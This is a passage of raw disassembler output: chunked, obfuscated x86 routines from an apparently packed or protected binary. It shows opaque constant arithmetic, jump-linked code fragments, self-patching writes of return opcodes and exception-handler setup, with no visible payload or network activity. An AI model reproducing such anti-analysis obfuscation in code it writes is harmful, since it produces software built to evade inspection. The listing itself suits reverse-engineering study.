loc_458CDD:				; CODE XREF: sub_44CDD5:loc_43C40Fj
		test	edi, edx
		jmp	loc_43DC83
; END OF FUNCTION CHUNK	FOR sub_44CDD5

; =============== S U B	R O U T	I N E =======================================



sub_458CE4	proc near		; CODE XREF: y2kk37jd:00446598j
					; y2kk37jd:0045860Cp

; FUNCTION CHUNK AT 0043C21F SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0044328A SIZE 00000006 BYTES
; FUNCTION CHUNK AT 0044B365 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00454D9F SIZE 0000000E BYTES

		xchg	eax, [esp+0]
		pop	eax
		push	62DFFA1Dh
		pop	ebx
		sub	ebx, 94E2CCF0h
		rol	ebx, 9
		cmp	ebx, 809037CCh
		jmp	loc_43C21F
sub_458CE4	endp ; sp-analysis failed

; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_45C4C8

loc_458D02:				; CODE XREF: sub_45C4C8:loc_45C4CDj
		mov	ebx, edi
		pop	edi
		add	ebx, 10EE8A16h
		and	ebx, 25299083h
		sub	ebx, 3FEA8B7Bh
		rol	ebx, 9
		add	ebx, 855B3B09h
		jmp	loc_445B54
; END OF FUNCTION CHUNK	FOR sub_45C4C8
; ---------------------------------------------------------------------------

loc_458D25:				; CODE XREF: y2kk37jd:00443399j
		add	esi, 18657829h
		xor	ebx, 45F27C5Ah

loc_458D31:				; CODE XREF: y2kk37jd:loc_44CD57j
		call	sub_45405E
		call	sub_43F4CE
; START	OF FUNCTION CHUNK FOR sub_4486E1

loc_458D3B:				; CODE XREF: sub_4486E1-6E2Cj
		jmp	loc_445F82
; END OF FUNCTION CHUNK	FOR sub_4486E1
; ---------------------------------------------------------------------------

loc_458D40:				; DATA XREF: sub_4545C0:loc_43DE9Bo
		push	15B64889h
		pop	ebx
		and	ebx, 2143387Ch
		jns	loc_44EC7A
; START	OF FUNCTION CHUNK FOR sub_4557D7

loc_458D52:				; CODE XREF: sub_4557D7+Dj
		jmp	sub_45B60B
; END OF FUNCTION CHUNK	FOR sub_4557D7
; ---------------------------------------------------------------------------

loc_458D57:				; CODE XREF: y2kk37jd:0044F62Cj
		jmp	loc_458262
; ---------------------------------------------------------------------------
		jz	loc_44B4B4
		jmp	loc_44501E
; ---------------------------------------------------------------------------

loc_458D67:				; DATA XREF: sub_45B41E-9196o
		mov	eax, [esp]

loc_458D6A:				; CODE XREF: y2kk37jd:004596CEj
		call	sub_453AF7
		add	eax, ebp
		jmp	sub_451C7D
; ---------------------------------------------------------------------------

loc_458D76:				; CODE XREF: y2kk37jd:loc_459807j
		mov	dword ptr [ebp-8], 1
		jmp	loc_445503
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44DBF8

loc_458D82:				; CODE XREF: y2kk37jd:004433CAj
					; y2kk37jd:00443732j ...
		mov	eax, [ebp-10h]
		push	eax
		call	sub_45AC4B
		jmp	loc_4440D4
; END OF FUNCTION CHUNK	FOR sub_44DBF8
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4585C4

loc_458D90:				; CODE XREF: sub_4585C4:loc_4585CFj
		add	esi, eax
		pop	eax
		mov	[esi], eax
		call	sub_43C851

loc_458D9A:				; CODE XREF: sub_447407+138E7j
		jmp	loc_44AABA
; END OF FUNCTION CHUNK	FOR sub_4585C4
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_441F5E

loc_458D9F:				; CODE XREF: sub_441F5E+EC2Bj
		jmp	loc_4594DE
; END OF FUNCTION CHUNK	FOR sub_441F5E
; ---------------------------------------------------------------------------

loc_458DA4:				; DATA XREF: sub_44E63A-79C8o
		mov	eax, [esp]
		push	edx
		call	sub_45AAD1
		mov	eax, 726FC43Ah
		jmp	loc_443C00
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43B163

loc_458DB7:				; CODE XREF: sub_43B163+18F25j
		cmp	ebx, 5408D65Bh
		jmp	loc_4497F3
; END OF FUNCTION CHUNK	FOR sub_43B163
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44426A

loc_458DC2:				; CODE XREF: sub_44426A+1C02j
		rol	eax, 14h

loc_458DC5:				; CODE XREF: sub_44426A+1BFAj
		add	ecx, 0AB6C429Fh
		add	ecx, ebp
		jmp	loc_44F651
; END OF FUNCTION CHUNK	FOR sub_44426A
; ---------------------------------------------------------------------------
		or	ebp, eax
		jmp	loc_43EF60

; =============== S U B	R O U T	I N E =======================================



sub_458DD9	proc near		; CODE XREF: sub_43ED86:loc_44DE41j

var_10		= dword	ptr -10h
arg_0		= dword	ptr  4

; FUNCTION CHUNK AT 0043D05B SIZE 0000000B BYTES
; FUNCTION CHUNK AT 0043DBA3 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 004472A0 SIZE 0000001A BYTES
; FUNCTION CHUNK AT 0044D2EC SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0044DE21 SIZE 0000000D BYTES
; FUNCTION CHUNK AT 004530A5 SIZE 0000000F BYTES
; FUNCTION CHUNK AT 00454AE5 SIZE 0000000C BYTES
; FUNCTION CHUNK AT 004598AF SIZE 0000000F BYTES
; FUNCTION CHUNK AT 0045A1C9 SIZE 00000005 BYTES

		push	ebx
		push	0A2CBC0B1h
		pop	ebx
		add	ebx, 0AB0D1231h
		xor	ebx, 713BB733h
		add	ebx, 0B2641E7Ah
		cmp	ebx, 9806A237h
		jmp	loc_43D05B
sub_458DD9	endp ; sp-analysis failed

; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_458681

loc_458DFD:				; CODE XREF: sub_458681:loc_458697j
		jnz	loc_454AF1
; END OF FUNCTION CHUNK	FOR sub_458681
; START	OF FUNCTION CHUNK FOR sub_458273

loc_458E03:				; CODE XREF: sub_458273-433Bj
		jmp	sub_459AFA
; END OF FUNCTION CHUNK	FOR sub_458273
; ---------------------------------------------------------------------------

loc_458E08:				; CODE XREF: y2kk37jd:0043E876j
		jmp	locret_43D10E
; ---------------------------------------------------------------------------
		not	ebp
		and	esi, ecx
		jmp	loc_454AF1
; ---------------------------------------------------------------------------

loc_458E16:				; CODE XREF: y2kk37jd:00458581j
		jl	loc_4594BF
; START	OF FUNCTION CHUNK FOR sub_4411C3

loc_458E1C:				; CODE XREF: sub_4411C3:loc_45856Ej
		or	edx, 0F9E4C427h
		jnz	loc_441CBD

loc_458E28:				; CODE XREF: y2kk37jd:0045180Dj
		jmp	nullsub_261
; END OF FUNCTION CHUNK	FOR sub_4411C3
; ---------------------------------------------------------------------------
		rol	edx, 0Ch
		mov	[edi], edx
		jmp	loc_441CBD
; ---------------------------------------------------------------------------
		push	0D9698EFh
		jmp	loc_45A85F
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43F911

loc_458E41:				; CODE XREF: sub_43F911:loc_45067Fj
		shr	edx, 3
		push	0EEEBF7C5h
		xchg	eax, [esp-4+arg_0]
		mov	ecx, eax
		pop	eax
		add	ecx, 2B1AAD28h
		xor	ecx, 0CE2176BEh
		jmp	loc_45C665
; END OF FUNCTION CHUNK	FOR sub_43F911
; ---------------------------------------------------------------------------
		xor	esi, 0B37127B5h
		jmp	sub_44C56D
; ---------------------------------------------------------------------------
		pop	edx
		jno	loc_43E569
		jmp	sub_457B90
; ---------------------------------------------------------------------------

loc_458E77:				; CODE XREF: y2kk37jd:0043E5CBj
		cmp	ebx, ecx
		jmp	loc_441A4B
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43DF1F

loc_458E7E:				; CODE XREF: sub_43DF1F+2D87j
		jz	loc_440E16
; END OF FUNCTION CHUNK	FOR sub_43DF1F
; START	OF FUNCTION CHUNK FOR sub_443AA7

loc_458E84:				; CODE XREF: sub_443AA7-3E3Dj
		jmp	loc_459CD3
; END OF FUNCTION CHUNK	FOR sub_443AA7
; ---------------------------------------------------------------------------

loc_458E89:				; CODE XREF: y2kk37jd:0043C35Cj
		jmp	loc_4505DB
; ---------------------------------------------------------------------------
		jg	loc_43B71E
		push	680BBA01h
		jmp	loc_440E10
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4408B9

loc_458E9E:				; CODE XREF: sub_4408B9-43D1j
		mov	ebp, edx
		xchg	ebp, [esp+4+var_4]
		push	offset loc_44498A
		jmp	nullsub_262
; END OF FUNCTION CHUNK	FOR sub_4408B9
; ---------------------------------------------------------------------------

loc_458EAD:				; CODE XREF: y2kk37jd:loc_455D9Ej
		xor	eax, eax
		mov	al, [ebp-0Ah]
		shr	eax, 4
		call	sub_45986D
; START	OF FUNCTION CHUNK FOR sub_43F5F8

loc_458EBA:				; CODE XREF: sub_43F5F8+19j
		jmp	loc_43ED4C
; END OF FUNCTION CHUNK	FOR sub_43F5F8
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_45B019

loc_458EBF:				; CODE XREF: sub_45B019-1DD3Cj
					; y2kk37jd:00440259j
		mov	eax, [ebp+var_20]
		movzx	eax, byte ptr [eax]
		mov	[ebp+var_1C], eax
		push	offset loc_459283
		jmp	nullsub_363
; END OF FUNCTION CHUNK	FOR sub_45B019
; ---------------------------------------------------------------------------

loc_458ED2:				; CODE XREF: y2kk37jd:004405F5j
		xchg	ebx, [eax]
; START	OF FUNCTION CHUNK FOR sub_4459CC

loc_458ED4:				; CODE XREF: sub_4459CC:loc_4405D9j
		xor	eax, 257A950h
		or	eax, 8E072517h
		xor	eax, 8BF509D1h
		add	eax, 0ABEA3D2Ah
		call	sub_44D6A5

loc_458EF1:				; CODE XREF: sub_4466E0-3E2j
		jmp	loc_43C695
; END OF FUNCTION CHUNK	FOR sub_4459CC
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4410D8

loc_458EF6:				; CODE XREF: sub_4410D8+16619j
		jz	loc_454AD1

loc_458EFC:				; CODE XREF: sub_459F98+7j
		jmp	sub_45AC4B
; END OF FUNCTION CHUNK	FOR sub_4410D8
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_444FD1

loc_458F01:				; CODE XREF: sub_444FD1+9j
		jmp	sub_442C3E
; END OF FUNCTION CHUNK	FOR sub_444FD1
; ---------------------------------------------------------------------------

loc_458F06:				; CODE XREF: y2kk37jd:0044374Cj
		jmp	loc_44616D
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44606C

loc_458F0B:				; CODE XREF: sub_44606C-7177j
		jmp	loc_44040F
; END OF FUNCTION CHUNK	FOR sub_44606C
; ---------------------------------------------------------------------------
		adc	ebx, edx
		cmp	ecx, ebx
		jmp	loc_454ACB
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4421DC

loc_458F19:				; CODE XREF: sub_4421DC+5j
		mov	esi, eax
		xchg	esi, [esp+0]
		mov	eax, [ebp-1Ch]
		shl	eax, 2
		cdq
		jnb	loc_44B590
		add	eax, [esp+0]
		push	offset sub_449C4F
		jmp	nullsub_264
; END OF FUNCTION CHUNK	FOR sub_4421DC

; =============== S U B	R O U T	I N E =======================================



sub_458F38	proc near		; DATA XREF: y2kk37jd:00455022o
		xchg	edi, [esp+0]
		jmp	loc_459E05
sub_458F38	endp

; ---------------------------------------------------------------------------

loc_458F40:				; CODE XREF: y2kk37jd:004560F7j
		jnz	loc_44F9BD

loc_458F46:				; CODE XREF: y2kk37jd:loc_447DD5j
		jmp	loc_43FFE9
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_445226

loc_458F4B:				; CODE XREF: sub_445226:loc_448CF1j
		mov	eax, 1
		call	sub_45AAC0
; END OF FUNCTION CHUNK	FOR sub_445226
; START	OF FUNCTION CHUNK FOR sub_44BD20

loc_458F55:				; CODE XREF: sub_44BD20-97Fj
		jmp	loc_45A4F7
; END OF FUNCTION CHUNK	FOR sub_44BD20
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4424B0

loc_458F5A:				; CODE XREF: sub_4424B0+6j
		jmp	loc_43C6F9
; END OF FUNCTION CHUNK	FOR sub_4424B0
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_457FAC

loc_458F5F:				; CODE XREF: sub_457FAC+Dj
		ror	edi, 16h

loc_458F62:				; CODE XREF: sub_443831:loc_44A51Fj
		push	0C191E19Ah
		xchg	edi, [esp+4+var_4]
		mov	eax, edi
		pop	edi
		xor	eax, ds:4000F2h
		sub	eax, 0AF8A6DDFh
		cmp	eax, 76AFF1D8h
		jmp	loc_44B04C
; END OF FUNCTION CHUNK	FOR sub_457FAC

; =============== S U B	R O U T	I N E =======================================



sub_458F84	proc near		; CODE XREF: y2kk37jd:0045820Fj
					; y2kk37jd:0045BB3Bp

; FUNCTION CHUNK AT 00448CA9 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0044E421 SIZE 00000007 BYTES

		xchg	edi, [esp+0]
		pop	edi
		push	eax
		ror	eax, 0Ch
		jmp	loc_448CA9
sub_458F84	endp ; sp-analysis failed


; =============== S U B	R O U T	I N E =======================================



sub_458F91	proc near		; CODE XREF: y2kk37jd:0044E1F5j
					; sub_44B814+B66Ap

; FUNCTION CHUNK AT 0043FF9C SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00451F87 SIZE 00000014 BYTES

		xchg	esi, [esp+0]
		pop	esi
		push	9D99437Ah
		pop	edi
		add	edi, 52BB62D5h
		or	edi, 31071678h
		jmp	loc_451F87
sub_458F91	endp ; sp-analysis failed

; [00000001 BYTES: COLLAPSED FUNCTION nullsub_203. PRESS KEYPAD	"+" TO EXPAND]
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_455556

loc_458FAD:				; CODE XREF: sub_455556-62C6j
		mov	[ebx], eax
		jmp	loc_45B42A
; END OF FUNCTION CHUNK	FOR sub_455556
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43BD0D

loc_458FB4:				; CODE XREF: sub_445226-8559j
					; sub_440B7C-38F4j ...
		mov	dword ptr [ebp-8], 1
		jmp	loc_450A07
; END OF FUNCTION CHUNK	FOR sub_43BD0D

; =============== S U B	R O U T	I N E =======================================



sub_458FC0	proc near		; CODE XREF: sub_445568+9p
					; y2kk37jd:00448F87j ...

var_4		= dword	ptr -4

; FUNCTION CHUNK AT 0043B53B SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00440C89 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 004415D9 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00446A42 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 004568CE SIZE 0000001D BYTES
; FUNCTION CHUNK AT 00456F4F SIZE 0000000B BYTES
; FUNCTION CHUNK AT 00457FBE SIZE 0000000E BYTES
; FUNCTION CHUNK AT 00458806 SIZE 00000013 BYTES

		jno	sub_447D0B

loc_458FC6:				; CODE XREF: y2kk37jd:0044C49Cj
		push	ebp
		mov	ebp, esp
		jmp	loc_457FBE
sub_458FC0	endp ; sp-analysis failed


; =============== S U B	R O U T	I N E =======================================



sub_458FCE	proc near		; CODE XREF: y2kk37jd:00446C23j
					; sub_447041+50E6p

; FUNCTION CHUNK AT 004482C9 SIZE 0000000C BYTES
; FUNCTION CHUNK AT 0044CEDB SIZE 0000000B BYTES
; FUNCTION CHUNK AT 0045B0A0 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0045BBD2 SIZE 00000016 BYTES

		xchg	eax, [esp+0]
		pop	eax
		mov	[ebp-4], eax
		push	0B96E52EEh
		pop	eax
		or	eax, 0CE395408h
		cmp	eax, 0F3FA5043h
		jmp	loc_44CEDB
sub_458FCE	endp ; sp-analysis failed

; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_45136B

loc_458FEC:				; CODE XREF: sub_45136B-1188Bj
		and	edi, 21279812h
		xor	edi, esi
		sub	esi, 65D15BBBh

loc_458FFA:				; CODE XREF: sub_45136B:loc_457170j
		push	9F272434h
		push	offset sub_444463
		jmp	nullsub_408
; END OF FUNCTION CHUNK	FOR sub_45136B
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_445787

loc_459009:				; CODE XREF: sub_445787+D86Dj
		cdq
		sub	ebp, 6AEA2E9Ah
		cmp	ebp, edx
		jmp	loc_45A59F
; END OF FUNCTION CHUNK	FOR sub_445787
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4487FD

loc_459017:				; CODE XREF: sub_4487FD:loc_456C4Cj
		push	offset loc_4573A4
		jmp	loc_459B75
; END OF FUNCTION CHUNK	FOR sub_4487FD
; ---------------------------------------------------------------------------
		mov	[ebx], ebp
		or	ebx, edi

loc_459025:				; CODE XREF: y2kk37jd:loc_45C3A6j
		jmp	sub_43E707
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_293. PRESS KEYPAD	"+" TO EXPAND]
; ---------------------------------------------------------------------------

loc_45902B:				; CODE XREF: y2kk37jd:0044916Bj
		jmp	locret_44800D
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_442376

loc_459030:				; CODE XREF: sub_442376+12B52j
		call	sub_44B9BD
; END OF FUNCTION CHUNK	FOR sub_442376

; =============== S U B	R O U T	I N E =======================================

; Attributes: bp-based frame


sub_459035	proc near		; DATA XREF: sub_440CD1o

var_C		= dword	ptr -0Ch
var_8		= dword	ptr -8
var_4		= dword	ptr -4

; FUNCTION CHUNK AT 0043B569 SIZE 00000019 BYTES
; FUNCTION CHUNK AT 0044E672 SIZE 00000005 BYTES

		push	ebp
		mov	ebp, esp
		jb	sub_4585C4
		add	esp, 0FFFFFED8h
		jmp	loc_43B569
sub_459035	endp

; ---------------------------------------------------------------------------
		cmp	eax, 102D60C6h
		jmp	loc_44FA80
; ---------------------------------------------------------------------------

loc_459054:				; CODE XREF: y2kk37jd:loc_43E633j
		mov	byte ptr [eax],	0C3h
		jmp	nullsub_451
; ---------------------------------------------------------------------------
		call	nullsub_257
		jmp	ds:dword_41E0C4
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_257. PRESS KEYPAD	"+" TO EXPAND]
; ---------------------------------------------------------------------------
		sub	byte ptr [edi-4Fh], 0FEh
		jmp	fword ptr [eax+43h]
; ---------------------------------------------------------------------------
		db 0F8h
		dd 11E90044h
		db 0EEh, 0FEh, 0FFh
; ---------------------------------------------------------------------------

loc_459077:				; CODE XREF: y2kk37jd:00440E32j
		jmp	ds:dword_41E19C
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_433. PRESS KEYPAD	"+" TO EXPAND]
		dw 3780h
; ---------------------------------------------------------------------------
		adc	edi, edi
		call	fword ptr [edx-75h]
		add	al, 24h
		jmp	loc_449C6B
; ---------------------------------------------------------------------------

loc_45908C:				; CODE XREF: y2kk37jd:00452FD1j
		mov	ebp, eax
		xchg	ebp, [esp]
		call	sub_45C4C8
		push	8AC3B6FFh
		pop	eax
		sub	eax, 120C921Ch
		rol	eax, 0Fh
		add	eax, 0BF01666Ch
		jmp	loc_455FBC
; ---------------------------------------------------------------------------

loc_4590B0:				; CODE XREF: y2kk37jd:loc_43CA18j
		or	edi, 0C4349B99h
		test	edi, 8000000h
		jmp	loc_444516
; ---------------------------------------------------------------------------
		mov	ecx, 98D386E1h
		jmp	sub_448512
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44615F

loc_4590CB:				; CODE XREF: sub_44615F:loc_459DD9j
		jz	loc_44E346
		jmp	loc_456761
; END OF FUNCTION CHUNK	FOR sub_44615F

; =============== S U B	R O U T	I N E =======================================



sub_4590D6	proc near		; CODE XREF: y2kk37jd:0043EE59j
					; sub_4436C1+96Bp

; FUNCTION CHUNK AT 004421EC SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00445A89 SIZE 00000013 BYTES
; FUNCTION CHUNK AT 0044B6A5 SIZE 00000009 BYTES

		xchg	edi, [esp+0]
		pop	edi
		jz	loc_452656
		mov	eax, [ebp-4]
		mov	al, [eax]
		and	al, 0F6h
		jmp	loc_4421EC
sub_4590D6	endp ; sp-analysis failed

; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_445226

loc_4590EC:				; CODE XREF: sub_445226-8EB2j
		or	ebx, 0D935EF0Bh
		rol	ebx, 1
		add	ebx, 17CAD5AAh
		add	ebx, ebp
		add	ebx, 2DC54A5Bh
		mov	[ebx], eax
		pop	ebx
		jmp	loc_43E915
; END OF FUNCTION CHUNK	FOR sub_445226
; ---------------------------------------------------------------------------
		push	0F7782040h
		pop	eax
		rol	eax, 0Bh
		xor	eax, 9AE0C002h
		call	sub_442C3E
		mov	ds:off_41E11C, eax
		lea	eax, sub_4597AE
		mov	byte ptr [eax],	0C3h
		jmp	loc_444706
; ---------------------------------------------------------------------------

loc_459132:				; CODE XREF: y2kk37jd:loc_44C19Ej
		inc	dword ptr [ebp-104h]
		jmp	loc_444AE4

; =============== S U B	R O U T	I N E =======================================



sub_45913D	proc near		; CODE XREF: sub_44D627:loc_4573CFp

; FUNCTION CHUNK AT 0043B88E SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00448991 SIZE 00000012 BYTES
; FUNCTION CHUNK AT 0044BD00 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 0044E5CE SIZE 00000007 BYTES
; FUNCTION CHUNK AT 0045134D SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00457831 SIZE 00000017 BYTES

		push	large dword ptr	fs:0
		mov	large fs:0, esp
		push	dword ptr [ebp-10h]
		call	sub_4476EE
		jmp	loc_45134D
sub_45913D	endp ; sp-analysis failed


; =============== S U B	R O U T	I N E =======================================

; Attributes: bp-based frame


sub_459158	proc near		; CODE XREF: sub_454413j

var_4		= dword	ptr -4

; FUNCTION CHUNK AT 0043EB5C SIZE 0000001D BYTES
; FUNCTION CHUNK AT 00440190 SIZE 00000006 BYTES
; FUNCTION CHUNK AT 00446640 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00456921 SIZE 00000005 BYTES

		push	ebp
		mov	ebp, esp
		push	edx
		mov	edx, edi
		xchg	edx, [esp+4+var_4]
		mov	edi, ecx
		jmp	loc_446640
sub_459158	endp


; =============== S U B	R O U T	I N E =======================================



sub_459168	proc near		; DATA XREF: sub_4411C3+D7CDo

var_4		= dword	ptr -4

; FUNCTION CHUNK AT 00458848 SIZE 00000005 BYTES

		push	edi
		push	0A462D65Eh
		pop	edi

loc_45916F:				; CODE XREF: y2kk37jd:loc_454B27j
		sub	edi, 600C3E41h
		add	edi, 0BBEE4E09h
		xchg	edi, [esp+4+var_4]
		jmp	loc_458848
sub_459168	endp

; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43F5BD

loc_459183:				; CODE XREF: sub_43F5BD+3j
		xchg	eax, [esp+4+var_4]
		mov	ebp, esp
		push	ecx
		mov	[ebp-4], eax

loc_45918C:				; CODE XREF: y2kk37jd:004435DEj
		mov	eax, [ebp-4]
		mov	al, [eax]
		jnz	loc_4414EF
		sub	al, 99h
		jmp	loc_44D382
; END OF FUNCTION CHUNK	FOR sub_43F5BD

; =============== S U B	R O U T	I N E =======================================



sub_45919E	proc near		; DATA XREF: sub_4480CB:loc_440647o

; FUNCTION CHUNK AT 00452898 SIZE 00000005 BYTES

		mov	ecx, [ebx+edx-4]
		or	ecx, ecx
		jmp	loc_452898
sub_45919E	endp

; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4480CB

loc_4591A9:				; CODE XREF: sub_43F8B8:loc_44F463j
					; sub_4480CB:loc_451AA2j
		call	sub_450F0B
; END OF FUNCTION CHUNK	FOR sub_4480CB

; =============== S U B	R O U T	I N E =======================================



sub_4591AE	proc near		; CODE XREF: sub_44D1D4-A5A7p
					; y2kk37jd:00444A76j
		xchg	ebx, [esp+0]
		pop	ebx
		xor	eax, 7F0ED67Eh
		add	eax, ebp
		add	eax, 5FA37AD1h
		push	ebx
		mov	ebx, eax

loc_4591C3:				; CODE XREF: sub_44B814+D24Cj
		xchg	ebx, [esp+0]
		jmp	loc_43B32D
sub_4591AE	endp

; [00000001 BYTES: COLLAPSED FUNCTION nullsub_243. PRESS KEYPAD	"+" TO EXPAND]
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_445226

loc_4591CC:				; CODE XREF: sub_445226+13158j
		jmp	loc_4566FA
; END OF FUNCTION CHUNK	FOR sub_445226
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4562E5

loc_4591D1:				; CODE XREF: sub_4562E5:loc_44E9EDj
		jl	loc_44E86A

loc_4591D7:				; CODE XREF: sub_4571F1+Dj
		jmp	sub_440337
; END OF FUNCTION CHUNK	FOR sub_4562E5
; ---------------------------------------------------------------------------

loc_4591DC:				; CODE XREF: y2kk37jd:00453DA5j
		jmp	loc_442269
; ---------------------------------------------------------------------------

loc_4591E1:				; CODE XREF: y2kk37jd:00441A68j
		jmp	loc_44168D
; ---------------------------------------------------------------------------
		and	ecx, eax
		xchg	ebx, [edx]
		jmp	loc_44E863
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4507BF

loc_4591EF:				; CODE XREF: sub_4507BF:loc_45525Dj
		jz	loc_4489AB
		jmp	loc_448C16
; END OF FUNCTION CHUNK	FOR sub_4507BF
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4448E2

loc_4591FA:				; CODE XREF: sub_4448E2+C06Dj
		ja	loc_4494AD

loc_459200:				; CODE XREF: sub_4448E2:loc_456751j
		mov	eax, [ebp+var_4]
		cmp	byte ptr [eax],	0F1h
		jnz	loc_452F74
		jmp	loc_459BFD
; END OF FUNCTION CHUNK	FOR sub_4448E2
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43BA66

loc_459211:				; CODE XREF: sub_43BA66:loc_43B99Aj
		mov	ds:dword_4470B8, eax
		jmp	loc_43D7CE
; END OF FUNCTION CHUNK	FOR sub_43BA66

; =============== S U B	R O U T	I N E =======================================

; Attributes: bp-based frame


sub_45921B	proc near		; CODE XREF: sub_43BA66j

; FUNCTION CHUNK AT 0043EB3E SIZE 0000000A BYTES
; FUNCTION CHUNK AT 00450D44 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0045B696 SIZE 00000017 BYTES

		push	ebp
		mov	ebp, esp
		push	ecx
		cmp	ds:dword_4470B8, 0
		jmp	loc_450D44
sub_45921B	endp

; [00000001 BYTES: COLLAPSED FUNCTION nullsub_319. PRESS KEYPAD	"+" TO EXPAND]

; =============== S U B	R O U T	I N E =======================================



sub_45922C	proc near		; CODE XREF: y2kk37jd:0043B990p
					; y2kk37jd:0045BF30j

; FUNCTION CHUNK AT 0044655C SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0044CE71 SIZE 00000019 BYTES
; FUNCTION CHUNK AT 0044ED26 SIZE 0000000C BYTES
; FUNCTION CHUNK AT 004520FC SIZE 00000006 BYTES
; FUNCTION CHUNK AT 00457981 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0045A999 SIZE 00000017 BYTES

		xchg	edx, [esp+0]
		pop	edx
		push	921ED915h
		pop	eax
		jmp	loc_457981
sub_45922C	endp ; sp-analysis failed

; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_448DCA

loc_45923B:				; CODE XREF: sub_448DCA+43B1j
		jge	loc_44927A
		add	edi, ebp
		jmp	loc_44926C
; END OF FUNCTION CHUNK	FOR sub_448DCA
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43F346

loc_459248:				; CODE XREF: sub_43F346-352Fj
					; sub_43F346:loc_4561F4j
		mov	eax, 0CF0182F6h
		call	sub_442C3E
		call	sub_440F0C
		jmp	nullsub_268
; END OF FUNCTION CHUNK	FOR sub_43F346
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4447EA

loc_45925C:				; CODE XREF: sub_4447EA+1C03j
		cmp	ecx, 6A382740h
		jmp	loc_451342
; END OF FUNCTION CHUNK	FOR sub_4447EA
; ---------------------------------------------------------------------------

loc_459267:				; CODE XREF: y2kk37jd:0044559Aj
		pop	eax
		and	eax, 27141C2Bh
		rol	eax, 19h
		add	eax, 0C94150F1h
		add	edx, eax
		push	offset sub_4474E2
		jmp	locret_4460C5
; ---------------------------------------------------------------------------

loc_459283:				; DATA XREF: sub_45B019-2151o
		inc	dword ptr [ebp-20h]
		mov	eax, [ebp-1Ch]
		mov	eax, ds:dword_44FC88[eax*4]
		mov	[ebp-8], eax
		cmp	dword ptr [ebp-8], 0
		jnz	loc_456F9D
; START	OF FUNCTION CHUNK FOR sub_44D302

loc_45929D:				; CODE XREF: sub_44D302+4j
					; sub_4492F7+DCA0j
		call	sub_4492F7

loc_4592A2:				; CODE XREF: sub_441DD4:loc_4565CFj
		jmp	loc_44B348
; END OF FUNCTION CHUNK	FOR sub_44D302
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44610D

loc_4592A7:				; CODE XREF: sub_44610D+Ej
		jz	loc_44268C
		jmp	loc_453491
; END OF FUNCTION CHUNK	FOR sub_44610D
; ---------------------------------------------------------------------------

loc_4592B2:				; CODE XREF: y2kk37jd:00443B69j
		jg	loc_4555E0

; =============== S U B	R O U T	I N E =======================================



sub_4592B8	proc near		; CODE XREF: sub_45913D:loc_43B88Ep
		xchg	ebx, [esp+0]
		pop	ebx
		pop	large dword ptr	fs:0
		add	esp, 4
		mov	eax, [ebp-10h]
		call	sub_44AD49

loc_4592CE:				; CODE XREF: sub_44D627+7j
					; sub_45913D-1900j
		push	edx
		jmp	loc_447EEE
sub_4592B8	endp ; sp-analysis failed
